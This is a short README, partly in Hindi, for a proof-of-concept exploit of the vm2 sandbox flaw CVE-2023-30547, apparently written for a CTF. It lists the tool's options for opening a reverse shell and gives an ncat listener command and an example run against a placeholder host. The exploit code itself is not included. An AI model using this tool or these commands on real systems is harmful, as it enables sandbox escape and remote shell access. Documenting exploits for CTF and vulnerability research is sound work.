
CVE-2023-30547 (लाइब्रेरी vm2) के लिए PoC
यह CVE-2023-30547 (https://nvd.nist.gov/vuln/detail/CVE-2023-30547) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट है। मैंने इस PoC को एक CTF के दौरान बनाया था।
CVE-2023-30547 PoC [-h] [--url URL] [--lhost LHOST] [--lport LPORT]
PoC for the vm2 vulnerability CVE-2023-30547
options:
-h, --help show this help message and exit
--url URL Target URL
--lhost LHOST IP of the local host for a reverse shell
--lport LPORT Port of the local host for a reverse shell
$ ncat -lnvp 1337
$ python3 exploit.py --url "http://vulnhost.local/run" --lhost 127.0.0.1 --lport 1337